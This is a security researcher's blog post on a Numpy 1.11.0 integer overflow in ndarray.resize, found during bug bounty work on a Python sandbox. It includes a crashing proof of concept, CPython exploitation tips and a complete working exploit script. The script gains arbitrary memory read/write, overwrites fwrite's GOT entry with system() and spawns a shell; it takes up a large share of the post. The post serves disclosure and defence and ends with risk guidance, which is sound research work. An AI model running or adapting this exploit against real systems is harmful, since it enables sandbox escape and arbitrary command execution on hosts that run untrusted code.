A few weeks ago I decided to scratch an itch I’ve been having for a while — to participate in some bug bounty programs. Perhaps the most daunting task of the bug bounty game is to pick a program which yields the highest return on investment. Soon though, I stumbled upon a web application that executes user-submitted code in a Python sandbox. This looked interesting so I decided to pursue it.

After a bit of poking around, I discovered how to break out of the sandbox with some hacks at the Python layer. Report filed. Bugs fixed, and a nice reward to boot, all within a couple of days. Sweet! A great start to my bug bounty adventures. But this post isn’t about that report. All in all, the issues I discovered are not that interesting from a technical perspective. And it turns out the issues were only present because of a regression.

But I wasn’t convinced that securing a Python sandbox would be so easy. Without going into too much detail, the sandbox uses a combination of OS-level isolation and a locked-down Python interpreter. The Python environment uses a custom whitelisting/blacklisting scheme to prevent access to unblessed builtins, modules, functions, etc. The OS-based isolation offers some extra protection, but it is antiquated by today’s standards. Breaking out of the locked-down Python interpreter is not a 100% win, but it puts the attacker dangerously close to being able to compromise the entire system.

So I returned to the application and prodded some more. No luck. This is indeed a tough cookie. But then I had a thought — Python modules are often just thin wrappers of mountainous C codebases. Surely there are gaggles of memory corruption vulns waiting to be found. Exploiting a memory corruption bug would let me break out of the restricted Python environment.





Where to begin? I knew which Python modules were whitelisted for import within the sandbox. Perhaps I should run a distributed network of AFL fuzzers? Or a symbolic execution engine? Or maybe I should scan them with a state-of-the-art static analysis tool? Sure, I could have done any of those things. Or I could have just queried some bug trackers.

As it turns out, I did not have this hindsight when beginning the hunt, but it did not matter much. My intuition led me to discover an exploitable memory corruption vulnerability in one of the sandbox’s whitelisted modules through manual code review and testing. The bug is in Numpy, a foundational library for scientific computing and the core of many popular packages, including scipy and pandas. To get a rough idea of Numpy’s potential as a source of memory corruption bugs, let’s check out the lines-of-code counts.

```
$ cloc *
     520 text files.
     516 unique files.
      43 files ignored.

http://cloc.sourceforge.net v 1.60 T=2.42 s (196.7 files/s, 193345.0 lines/s)
---------------------------------------------------------------------
Language                    files       blank     comment        code
---------------------------------------------------------------------
C                              68       36146       70025      170992
Python                        311       27718       57961       87081
C/C++ Header                   82        1778        2887        7847
Cython                          1         947        2556        1627
Fortran 90                     10          52          12         136
Fortran 77                      3           2           1          83
make                            1          15          19          62
---------------------------------------------------------------------
SUM:                          476       66658      133461      267828
```

In the remainder of this post, I first describe the conditions which lead to the vulnerability. Next, I discuss some quirks of the CPython runtime which exploit developers should be aware of, and then I walk through the actual exploit. Finally, I wrap up with thoughts on quantifying the risk of memory corruption issues in Python applications.

### The Vulnerability

The vulnerability which I am going to walk through is an integer overflow bug in Numpy v1.11.0 (and probably older versions). The issue has been fixed since v1.12.0, but there was no security advisory issued.

The vulnerability resides in the API for resizing Numpy’s multidimensional array-like objects, `ndarray` and friends. `resize` is called with a tuple defining the array’s shape, where each element of the tuple is the size of a dimension.

```
$ python
>>> import numpy as np
>>> arr = np.ndarray((2, 2), 'int32')
>>> arr.resize((2, 3))
>>> arr
array([[-895628408,      32603, -895628408],
       [     32603,          0,          0]], dtype=int32)
```

Under the covers, `resize` actually `realloc`'s a buffer, with the size calculated as the product of each element in the shape tuple and the element size. So in the prior snippet of code, `arr.resize((2, 3))` boils down to C code `realloc(buffer, 2 * 3 * sizeof(int32))`. The next code snippet is the heavily paraphrased implementation of `resize` in C.

```c
NPY_NO_EXPORT PyObject *
PyArray_Resize(PyArrayObject *self, PyArray_Dims *newshape, int refcheck,
               NPY_ORDER order)
{
    // npy_intp is `long long`
    npy_intp* new_dimensions = newshape->ptr;
    npy_intp newsize = 1;
    int new_nd = newshape->len;
    int k;
    // NPY_MAX_INTP is MAX_LONGLONG (0x7fffffffffffffff)
    npy_intp largest = NPY_MAX_INTP / PyArray_DESCR(self)->elsize;
    for(k = 0; k < new_nd; k++) {
        newsize *= new_dimensions[k];
        if (newsize <= 0 || newsize > largest) {
            return PyErr_NoMemory();
        }
    }
    if (newsize == 0) {
        sd = PyArray_DESCR(self)->elsize;
    }
    else {
        sd = newsize*PyArray_DESCR(self)->elsize;
    }
    /* Reallocate space if needed */
    new_data = realloc(PyArray_DATA(self), sd);
    if (new_data == NULL) {
        PyErr_SetString(PyExc_MemoryError,
                        "cannot allocate memory for array");
        return NULL;
    }
    ((PyArrayObject_fields *)self)->data = new_data;
    /* ... */
}
```

Spot the vulnerability? Inside the for-loop (line 13), each dimension is multiplied into the running size. Later (line 25), the product of the new size and the element size is passed to `realloc` as the size of the memory that holds the array. The new size is validated before the `realloc`, but the check only runs after each multiplication has already happened, so it never detects integer overflow: a product that wraps around to a small positive value passes, and very large dimensions can produce an array that is allocated with insufficient size. **Ultimately, this gives the attacker a powerful exploit primitive: the ability to read or write arbitrary memory by indexing into an array with an overflowed size.**
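To see the wraparound concretely, here is a small Python model of the size computation in `PyArray_Resize`. It is a sketch that assumes 64-bit `npy_intp` arithmetic wrapping around in two's complement, which is what the compiled C code does in practice (signed overflow is technically undefined behavior in C). The helper names `wrap_int64` and `resize_nbytes` are hypothetical; the dimensions and element size are the ones used in the proof of concept below.

```python
# Model of the size check in PyArray_Resize, assuming 64-bit npy_intp
# arithmetic that wraps around (two's complement) on overflow.
NPY_MAX_INTP = (1 << 63) - 1


def wrap_int64(value):
    """Reduce an arbitrary Python int to a signed 64-bit value."""
    value &= (1 << 64) - 1
    return value - (1 << 64) if value >= (1 << 63) else value


def resize_nbytes(shape, elsize):
    """Return the byte count that would be passed to realloc, or raise MemoryError."""
    largest = NPY_MAX_INTP // elsize
    newsize = 1
    for dim in shape:
        newsize = wrap_int64(newsize * dim)  # wraps silently, like the C code
        # The check only sees the already-wrapped product.
        if newsize <= 0 or newsize > largest:
            raise MemoryError("rejected by the size check")
    # Mirrors the C code's special case for a zero-sized array.
    return elsize if newsize == 0 else newsize * elsize


# 0x1000 * 0x100000000000001 wraps to 0x1000, so only 0x1000 * 0x100 bytes are requested.
print(hex(resize_nbytes((0x1000, 0x100000000000001), 0x100)))  # 0x100000
```

The check rejects products that wrap to zero or a negative number, but a product that wraps all the way around to a small positive value sails through.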

Let’s develop a quick proof of concept that demonstrates the bug.

```
$ cat poc.py
import numpy as np

arr = np.array('A'*0x100)
arr.resize(0x1000, 0x100000000000001)
print "bytes allocated for entire array: " + hex(arr.nbytes)
print "max # of elements for inner array: " + hex(arr[0].size)
print "size of each element in inner array: " + hex(arr[0].itemsize)
arr[0][10000000000]

$ python poc.py
bytes allocated for entire array: 0x100000
max # of elements for inner array: 0x100000000000001
size of each element in inner array: 0x100
[1] 2517 segmentation fault (core dumped) python poc.py

$ gdb `which python` core
...
Program terminated with signal SIGSEGV, Segmentation fault.
(gdb) bt
#0  0x00007f20a5b044f0 in PyArray_Scalar (data=0x8174ae95f010, descr=0x7f20a2fb5870,
    base=<numpy.ndarray at remote 0x7f20a7870a80>) at numpy/core/src/multiarray/scalarapi.c:651
#1  0x00007f20a5add45c in array_subscript (self=0x7f20a7870a80, op=<optimized out>)
    at numpy/core/src/multiarray/mapping.c:1619
#2  0x00000000004ca345 in PyEval_EvalFrameEx () at ../Python/ceval.c:1539
...
(gdb) x/i $pc
=> 0x7f20a5b044f0 <PyArray_Scalar+480>: cmpb   $0x0,(%rcx)
(gdb) x/g $rcx
0x8174ae95f10f: Cannot access memory at address 0x8174ae95f10f
```

### Quirks of the CPython runtime

Before we walk through developing the exploit, I would like to discuss some ways in which the CPython runtime eases exploitation, but also ways in which it can frustrate the exploit developer. Feel free to skip this section if you want to dive straight into the exploit.

#### Leaking memory addresses

Typically one of the first hurdles exploits must deal with is to defeat address-space layout randomization (ASLR). Fortunately for attackers, Python makes this easy. The builtin `id` function returns the memory address of an object, or more precisely the address of the PyObject structure which encapsulates the object.

```
$ gdb -q --args /usr/bin/python2.7
(gdb) run -i
...
>>> a = 'A'*0x100
>>> b = 'B'*0x100000
>>> import numpy as np
>>> c = np.ndarray((10, 10))
>>> hex(id(a))
'0x7ffff7f65848'
>>> hex(id(b))
'0xa52cd0'
>>> hex(id(c))
'0x7ffff7e777b0'
```

In real-world applications, developers should make sure not to expose `id(object)` to users. In a sandboxed environment there is not much you can do about this behavior, except perhaps blacklisting `id` or re-implementing `id` to return a hash.
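As a rough sketch of the second option, a sandbox could expose a function like the one below in place of the builtin `id`. It returns a keyed hash of the real address, so values stay stable while an object is alive and identity comparisons keep working, but they no longer reveal where the object lives. The name `opaque_id` and the per-process random key are assumptions for illustration, not something the sandbox in question actually did.

```python
import hashlib
import hmac
import os

# Per-process secret key (an assumption of this sketch). Without it, the
# returned values cannot be mapped back to memory addresses.
_ID_KEY = os.urandom(32)


def opaque_id(obj):
    """Replacement for id() that does not reveal memory addresses.

    Like id(), the result is stable while obj is alive (and may be reused
    after obj is freed), because it is derived from id(obj). Truncating the
    HMAC to 64 bits makes collisions possible but vanishingly unlikely.
    """
    real_id = str(id(obj)).encode("ascii")
    mac = hmac.new(_ID_KEY, real_id, hashlib.sha256).hexdigest()
    return int(mac[:16], 16)
```

This only closes one leak: the default `repr` of many objects still prints an address (for example `<object object at 0x...>`), so a sandbox would need to deal with those as well.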

#### Understand memory allocation behavior

Understanding your allocator is critical for writing exploits. Python has different allocation strategies based on object type and size. Let’s check out where our big string `0xa52cd0`, little string `0x7ffff7f65848`, and numpy array `0x7ffff7e777b0` landed.

```
$ cat /proc/`pgrep python`/maps
00400000-006ea000 r-xp 00000000 08:01 2712        /usr/bin/python2.7
008e9000-008eb000 r--p 002e9000 08:01 2712        /usr/bin/python2.7
008eb000-00962000 rw-p 002eb000 08:01 2712        /usr/bin/python2.7
00962000-00fa8000 rw-p 00000000 00:00 0           [heap]   # big string
...
7ffff7e1d000-7ffff7edd000 rw-p 00000000 00:00 0            # numpy array
...
7ffff7f0e000-7ffff7fd3000 rw-p 00000000 00:00 0            # small string
```

Big string is in the regular heap. Small string and numpy array are in separate mmap’d regions.
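To repeat this lookup without eyeballing the maps file, a small helper can parse `/proc/<pid>/maps` and report which mapping contains a given address. This is a sketch assuming the standard Linux maps format (`start-end perms offset dev inode [path]`); the function names `parse_maps` and `region_for` are illustrative.

```python
def parse_maps(text):
    """Parse /proc/<pid>/maps content into (start, end, perms, path) tuples."""
    regions = []
    for line in text.splitlines():
        # maxsplit=5 keeps paths that contain spaces in one field
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue  # skip blank or malformed lines
        start, end = (int(x, 16) for x in fields[0].split("-"))
        path = fields[5].strip() if len(fields) == 6 else ""  # anonymous mappings have no path
        regions.append((start, end, fields[1], path))
    return regions


def region_for(addr, text):
    """Return the mapping that contains addr, or None. The end address is exclusive."""
    for start, end, perms, path in parse_maps(text):
        if start <= addr < end:
            return start, end, perms, path
    return None
```

On Linux, `region_for(id(obj), open('/proc/self/maps').read())` reports where `obj` landed in the current process.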

#### Python object structure

Leaking and corrupting Python object metadata can be quite powerful, so it’s useful to understand how Python objects are represented. Under the covers, Python objects all derive from PyObject, a structure which contains a reference count and a descriptor of the object’s actual type. Of note, the type descriptor contains many fields, including function pointers which could be useful to read or overwrite.

Let’s inspect the small string we created in the section just prior.

```
(gdb) print *(PyObject *)0x7ffff7f65848
$2 = {ob_refcnt = 1, ob_type = 0x9070a0 <PyString_Type>}
(gdb) print *(PyStringObject *)0x7ffff7f65848
$3 = {ob_refcnt = 1, ob_type = 0x9070a0 <PyString_Type>, ob_size = 256, ob_shash = -1, ob_sstate = 0, ob_sval = "A"}
(gdb) x/s ((PyStringObject *)0x7ffff7f65848)->ob_sval
0x7ffff7f6586c: 'A' <repeats 200 times>...
(gdb) ptype PyString_Type
type = struct _typeobject {
    Py_ssize_t ob_refcnt;
    struct _typeobject *ob_type;
    Py_ssize_t ob_size;
    const char *tp_name;
    Py_ssize_t tp_basicsize;
    Py_ssize_t tp_itemsize;
    destructor tp_dealloc;
    printfunc tp_print;
    getattrfunc tp_getattr;
    setattrfunc tp_setattr;
    cmpfunc tp_compare;
    reprfunc tp_repr;
    PyNumberMethods *tp_as_number;
    PySequenceMethods *tp_as_sequence;
    PyMappingMethods *tp_as_mapping;
    hashfunc tp_hash;
    ternaryfunc tp_call;
    reprfunc tp_str;
    getattrofunc tp_getattro;
    setattrofunc tp_setattro;
    PyBufferProcs *tp_as_buffer;
    long tp_flags;
    const char *tp_doc;
    traverseproc tp_traverse;
    inquiry tp_clear;
    richcmpfunc tp_richcompare;
    Py_ssize_t tp_weaklistoffset;
    getiterfunc tp_iter;
    iternextfunc tp_iternext;
    struct PyMethodDef *tp_methods;
    struct PyMemberDef *tp_members;
    struct PyGetSetDef *tp_getset;
    struct _typeobject *tp_base;
    PyObject *tp_dict;
    descrgetfunc tp_descr_get;
    descrsetfunc tp_descr_set;
    Py_ssize_t tp_dictoffset;
    initproc tp_init;
    allocfunc tp_alloc;
    newfunc tp_new;
    freefunc tp_free;
    inquiry tp_is_gc;
    PyObject *tp_bases;
    PyObject *tp_mro;
    PyObject *tp_cache;
    PyObject *tp_subclasses;
    PyObject *tp_weaklist;
    destructor tp_del;
    unsigned int tp_version_tag;
}
```
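The same header can also be read from inside the interpreter with ctypes. This sketch assumes a regular 64-bit CPython build (not a debug or free-threaded build), where `ob_refcnt` sits at offset 0 and `ob_type` immediately follows it, and it relies on the CPython implementation detail that `id()` returns the object's address. The helper name `pyobject_header` is illustrative; only read objects that you keep alive while reading.

```python
import ctypes


def pyobject_header(obj):
    """Return (ob_refcnt, ob_type) read directly from obj's PyObject header.

    Assumes a regular (non-debug, non-free-threaded) CPython build, where the
    header is a Py_ssize_t reference count followed by a pointer to the type.
    """
    addr = id(obj)  # CPython detail: id() is the address of the PyObject
    refcnt = ctypes.c_ssize_t.from_address(addr).value
    type_ptr = ctypes.c_void_p.from_address(
        addr + ctypes.sizeof(ctypes.c_ssize_t)).value
    return refcnt, type_ptr


items = [1, 2, 3]
refcnt, type_ptr = pyobject_header(items)
# type_ptr should be the address of the list type object, i.e. id(list).
print(refcnt, hex(type_ptr), type_ptr == id(list))
```

This is the in-process analogue of the `print *(PyObject *)...` command above, and it shows why an arbitrary-read primitive plus a leaked address is enough to walk from an object to its type descriptor.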

#### Shellcode like it’s 1999

The ctypes library serves as a bridge between Python and C code. It provides C-compatible data types and allows calling functions in DLLs or shared libraries. Many modules with C bindings, or that need to call into shared libraries, import ctypes.

I noticed that importing ctypes results in a 4K-sized memory region being mapped with read/write/execute permissions. If it wasn’t already obvious, this means that attackers do not even need to write a ROP chain. Exploiting a bug is as simple as pointing the instruction pointer at your shellcode, provided you have already located the RWX region.

Test it for yourself!

```
$ cat foo.py
import ctypes

while True:
    pass
$ python foo.py
^Z
[2]  + 30567 suspended  python foo.py
$ grep rwx /proc/30567/maps
7fcb806d5000-7fcb806d6000 rwxp 00000000 00:00 0
```

Investigating further, I discovered that [libffi’s closure API](http://www.chiark.greenend.org.uk/doc/libffi-dev/html/The-Closure-API.html) is [responsible](https://github.com/libffi/libffi/blob/master/src/closures.c#L762) for `mmap`ing the RWX region. However, the region cannot be allocated RWX on certain platforms, such as systems with SELinux enforced or PaX mprotect enabled, and there is code which works around this limitation.

I did not spend much time trying to reliably locate the RWX mapping, but in theory it should be possible if you have an arbitrary-read exploit primitive. While ASLR is applied to libraries, the dynamic linker maps the regions of each library in a predictable order. A library’s regions include its code and its private globals, and libffi stores a reference to the RWX region as a global. If, for example, you find a pointer to a libffi function on the heap, you could precalculate the address of the RWX-region pointer as an offset from that function pointer. The offset would need to be adjusted for each library version.
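The arithmetic is simple once the offsets for a particular libffi build are known. In this sketch, `FFI_FUNC_OFFSET` and `RWX_PTR_OFFSET` are hypothetical placeholder values standing in for the offsets, from the library's load base, of a leaked libffi function and of the global holding the RWX pointer in one specific build; they would have to be measured (for example with a debugger) for each library version. The address it returns would then be dereferenced with the arbitrary-read primitive to obtain the RWX region itself.

```python
# Hypothetical offsets from libffi's load base for ONE specific build.
# These are placeholders, not real values; measure them per library version.
FFI_FUNC_OFFSET = 0x6F30   # hypothetical: offset of a leaked libffi function
RWX_PTR_OFFSET = 0x20A8C8  # hypothetical: offset of the global RWX-region pointer


def rwx_pointer_address(leaked_func_ptr,
                        func_offset=FFI_FUNC_OFFSET,
                        rwx_ptr_offset=RWX_PTR_OFFSET):
    """Turn one leaked libffi function pointer into the address of the global
    that stores the RWX region's address.

    ASLR slides the whole library by a single base address, and its segments
    keep fixed distances from one another, so base = leaked - func_offset and
    the global lives at base + rwx_ptr_offset.
    """
    base = leaked_func_ptr - func_offset
    # Shared objects are loaded at page-aligned bases; anything else means the
    # offsets do not belong to the library build that was leaked.
    if base & 0xFFF:
        raise ValueError("leak does not match these offsets (base not page-aligned)")
    return base + rwx_ptr_offset
```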

#### De facto exploit mitigations

I tested the security-related compiler flags of the Python 2.7 binary on Ubuntu 14.04.5 and 16.04.1. There are a couple of weaknesses that are quite useful for the attacker:

* Partial RELRO: The executable’s [GOT section](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html), which contains pointers to library functions dynamically linked into the binary, is writable. Exploits could replace the address of `printf()` with `system()` for example.

* No PIE: The binary is not a Position-Independent Executable, meaning that while the kernel applies ASLR to most memory mappings, the contents of the binary itself are mapped to static addresses. Since the GOT section is part of the binary, no PIE makes it easier for attackers to locate and write to the GOT.
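Whether a binary is PIE can be checked from its ELF header alone: non-PIE executables have `e_type` equal to `ET_EXEC` (2), while PIE executables, like shared libraries, are `ET_DYN` (3). This sketch reads only that one field, so it is a rough heuristic: it cannot tell a PIE from a shared library, and it says nothing about RELRO, which requires walking the program headers (as `readelf -l` does). The function names are illustrative.

```python
import struct

ET_EXEC = 2  # fixed-address executable (no PIE)
ET_DYN = 3   # position-independent executable or shared object


def elf_type(header):
    """Return e_type from the first 18+ bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # EI_DATA (byte 5): 1 = little-endian, 2 = big-endian
    endian = "<" if header[5:6] == b"\x01" else ">"
    # e_type is a 16-bit field at offset 16 in both 32- and 64-bit ELF files
    return struct.unpack_from(endian + "H", header, 16)[0]


def is_pie(path):
    """Heuristic: True if the ELF file at path is ET_DYN (PIE or shared object)."""
    with open(path, "rb") as f:
        return elf_type(f.read(18)) == ET_DYN
```

For example, `is_pie("/usr/bin/python2.7")` performs this check against the interpreter binary discussed above.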

#### Road blocks

While CPython is an environment full of tools for the exploit developer, there are forces which broke many of my exploit attempts and were difficult to debug.

* The garbage collector, type system, and possibly other unknown forces will break your exploit if you aren’t careful about clobbering object metadata.

* `id()` can be unreliable. For reasons I could not determine, Python sometimes appears to pass a copy of the object while the original object is used.

* The region where objects are allocated is somewhat unpredictable. For reasons I could not determine, certain coding patterns led to buffers being allocated in the `brk` heap, while other patterns led to allocation in a Python-specific `mmap`'d heap.

### The exploit

Soon after discovering the numpy integer overflow, I submitted a report to the bug bounty with a proof of concept that hijacked the instruction pointer but did not inject any code. When I initially submitted, I did not realize that the PoC was actually pretty unreliable, and I wasn’t able to test it properly against their servers, because validating a hijack of the instruction pointer requires access to core dumps or a debugger. The vendor acknowledged the issue’s legitimacy, but they gave a smaller reward than for my first report.

Fair enough!

I’m not really an exploit developer, but I challenged myself to do better. After much trial and error, I eventually wrote an exploit which appears to be reliable. Unfortunately I was never able to test it in the vendor’s sandbox because they updated numpy before I could finish, but it does work when testing locally in a Python interpreter.

At a high level, the exploit gains an arbitrary read/write primitive by overflowing the size of a numpy array. The primitive is used to write the address of `system` to `fwrite`'s GOT/PLT entry. Python’s builtin `print` calls `fwrite` under the covers, so from then on you can call `print '/bin/sh'` to get a shell, or replace `/bin/sh` with any command.

There is a bit more to it than the high-level explanation, so check out the full exploit below. I recommend reading it from the bottom up, including the comments. If you are using a different version of Python, adjust the GOT locations for `fwrite` and `system` before you run it.

```python
import numpy as np

# addr_to_str is a quick and dirty replacement for struct.pack(), needed
# for sandbox environments that block the struct module.
def addr_to_str(addr):
    addr_str = "%016x" % (addr)
    ret = str()
    for i in range(16, 0, -2):
        ret = ret + addr_str[i-2:i].decode('hex')
    return ret

# read_address and write_address use overflown numpy arrays to search for
# bytearray objects we've sprayed on the heap, represented as a PyByteArray
# structure:
#
# struct PyByteArray {
#     Py_ssize_t ob_refcnt;
#     struct _typeobject *ob_type;
#     Py_ssize_t ob_size;
#     int ob_exports;
#     Py_ssize_t ob_alloc;
#     char *ob_bytes;
# };
#
# Once located, the pointer to actual data `ob_bytes` is overwritten with the
# address that we want to read or write. We then cycle through the list of byte
# arrays until we find the one that has been corrupted. This bytearray is used
# to read or write the desired location. Finally, we clean up by setting
# `ob_bytes` back to its original value.
def find_address(addr, data=None):
    i = 0
    j = -1
    k = 0
    if data:
        size = 0x102
    else:
        size = 0x103
    for k, arr in enumerate(arrays):
        i = 0
        for i in range(0x2000):  # 0x2000 is a value that happens to work
            # Here we search for the signature of a PyByteArray structure
            j = arr[0][i].find(addr_to_str(0x1))  # ob_refcnt
            if (j < 0 or
                    arr[0][i][j+0x10:j+0x18] != addr_to_str(size) or  # ob_size
                    arr[0][i][j+0x20:j+0x28] != addr_to_str(size+1)):  # ob_alloc
                continue
            idx_bytes = j+0x28  # ob_bytes
            # Save an unclobbered copy of the bytearray metadata
            saved_metadata = arrays[k][0][i]
            # Overwrite the ob_bytes pointer with the provided address
            addr_string = addr_to_str(addr)
            new_metadata = (saved_metadata[0:idx_bytes] +
                            addr_string +
                            saved_metadata[idx_bytes+8:])
            arrays[k][0][i] = new_metadata
            ret = None
            for bytearray_ in bytearrays:
                try:
                    # We differentiate the signature by size for each
                    # find_address invocation because we don't want to
                    # accidentally clobber the wrong bytearray structure.
                    # We know we've hit the structure we're looking for if
                    # the size matches and its contents do not equal 'XXXXXXXX'
                    if len(bytearray_) == size and bytearray_[0:8] != 'XXXXXXXX':
                        if data:
                            bytearray_[0:8] = data  # write memory
                        else:
                            ret = bytearray_[0:8]  # read memory
                        # restore the original PyByteArray->ob_bytes
                        arrays[k][0][i] = saved_metadata
                        return ret
                except:
                    pass
            # None of the sprayed bytearrays picked up the new pointer, so
            # restore the metadata before continuing the search.
            arrays[k][0][i] = saved_metadata
    raise Exception("Failed to find address %x" % addr)

def read_address(addr):
    return find_address(addr)

def write_address(addr, data):
    find_address(addr, data)

# The addresses of the GOT/PLT entries for system() and fwrite() are hardcoded.
# These addresses are static for a given Python binary when compiled without -fPIE.
# You can obtain them yourself with the following command:
# `readelf -a /path/to/python | grep -E '(system|fwrite)'`
SYSTEM = 0x8eb278
FWRITE = 0x8eb810

# Spray the heap with some bytearrays and overflown numpy arrays.
arrays = []
bytearrays = []
for i in range(100):
    arrays.append(np.array('A'*0x100))
    arrays[-1].resize(0x1000, 0x100000000000001)
    bytearrays.append(bytearray('X'*0x102))
    bytearrays.append(bytearray('X'*0x103))

# Read the address of system() and write it to fwrite()'s PLT entry.
data = read_address(SYSTEM)
write_address(FWRITE, data)

# print() will now call system() with whatever string you pass
print "PS1='[HACKED] $ ' /bin/sh"
```
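`addr_to_str` relies on Python 2’s `str.decode('hex')`. For readers experimenting on Python 3, this is a rough equivalent that likewise avoids the `struct` module and produces the same 8 little-endian bytes that `struct.pack('<Q', addr)` would; the name `addr_to_bytes` is illustrative.

```python
def addr_to_bytes(addr):
    """Pack a 64-bit address as 8 little-endian bytes, without the struct module.

    Mirrors addr_to_str from the exploit: least significant byte first, which
    is how x86-64 stores pointers in memory.
    """
    if not 0 <= addr < (1 << 64):
        raise ValueError("address does not fit in 64 bits")
    return bytes(bytearray((addr >> (8 * i)) & 0xFF for i in range(8)))
```

On Python 3, `addr.to_bytes(8, 'little')` does the same thing in a single call.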

Running the exploit gives you a “hacked” shell.

```
$ virtualenv .venv
Running virtualenv with interpreter /usr/bin/python2
New python executable in /home/gabe/Downloads/numpy-exploit/.venv/bin/python2
Also creating executable in /home/gabe/Downloads/numpy-exploit/.venv/bin/python
Installing setuptools, pkg_resources, pip, wheel...done.
$ source .venv/bin/activate
(.venv) $ pip install numpy==1.11.0
Collecting numpy==1.11.0
  Using cached numpy-1.11.0-cp27-cp27mu-manylinux1_x86_64.whl
Installing collected packages: numpy
Successfully installed numpy-1.11.0
(.venv) $ python --version
Python 2.7.12
(.venv) $ python numpy_exploit.py
[HACKED] $
```

### Quantifying the risk

It is well known that much of Python’s core and many third-party modules are thin wrappers of C code. Perhaps less recognized is the fact that memory corruption bugs are reported in popular Python modules all the time without so much as a CVE, a security advisory, or even a mention of security fixes in release notes.

So yes, there are a lot of memory corruption bugs in Python modules. Surely not all of them are exploitable, but you have to start somewhere. To reason about the risk posed by memory corruption bugs, I find it helpful to frame the conversation in terms of two discrete use-cases: regular Python applications, and sandboxing untrusted code.

#### Regular applications

The types of applications we’re concerned with are those with a meaningful attack surface. Think web applications and other network-facing services, client applications that process untrusted content, privileged system services, etc. Many of these applications import Python modules built on mountains of C code from projects that do not treat their memory corruption bugs as security issues. The mere thought of this may keep some security professionals up at night, but in reality the risk is typically downplayed or ignored. I suspect there are a few reasons:

* Remotely identifying and exploiting memory corruption issues is quite difficult, especially in closed-source applications.

* The likelihood that an application exposes a path for untrusted input to reach a vulnerable function is probably quite low.

* Awareness is low because memory corruption bugs in Python modules are not typically tracked as security issues.

So fair enough, the likelihood of getting compromised due to a buffer overflow in some random Python module is probably quite low. But then again, memory corruption flaws can be extremely damaging when they do happen. Sometimes they cause harm without anyone deliberately exploiting them (see Cloudbleed). To make matters worse, it’s nigh impossible to keep libraries patched when their maintainers do not think about memory corruption issues in terms of security.

If you develop a major Python application, I suggest you at least take an inventory of the Python modules it uses. Try to find out how much C code those modules rely on, and analyze how much of that native code is exposed at the edge of your application.
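As a starting point for that inventory, this Python 3 sketch lists the modules loaded in the running interpreter that come from compiled extension files, using `importlib.machinery.EXTENSION_SUFFIXES`. It only sees modules imported so far, reports modules compiled into the interpreter itself (`sys.builtin_module_names`) separately because they have no file, and does not measure how much C code sits behind each one. The function name `native_modules` is illustrative.

```python
import importlib.machinery
import sys


def native_modules():
    """Return (extension_modules, builtin_modules) for the running interpreter.

    extension_modules: sorted (name, path) pairs for loaded modules whose file
    ends in a native extension suffix such as '.so' or '.pyd'.
    builtin_modules: sorted names of modules compiled into the interpreter.
    """
    suffixes = tuple(importlib.machinery.EXTENSION_SUFFIXES)
    extensions = []
    # Copy the items, since importing can mutate sys.modules while we iterate.
    for name, module in list(sys.modules.items()):
        path = getattr(module, "__file__", None)
        if isinstance(path, str) and path.endswith(suffixes):
            extensions.append((name, path))
    return sorted(extensions), sorted(sys.builtin_module_names)


if __name__ == "__main__":
    # Import your application's entry point first so its dependencies are loaded.
    extensions, builtins = native_modules()
    for name, path in extensions:
        print(name, path)
```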

#### Sandboxing

There are a number of services out there that allow users to run untrusted Python code within a sandbox. OS-level sandboxing features, such as Linux namespaces and seccomp, have only become popular relatively recently, in the form of Docker, LXC, etc. Unfortunately, weaker sandboxing techniques can still be found in use today: at the OS layer in the form of chroot jails, or, worse, entirely in Python (see [pypy-sandbox](http://doc.pypy.org/en/latest/sandbox.html) and [pysandbox](https://github.com/haypo/pysandbox)).

Memory corruption bugs completely break sandboxing which is not enforced by the OS. The ability to execute a subset of Python code makes exploitation far more feasible than in regular applications. Even pypy-sandbox, which claims to be secure because of its two-process model which virtualizes system calls, can be broken by a buffer overflow.

If you want to run untrusted code of any kind, invest the effort in building a secure OS and network architecture to sandbox it.
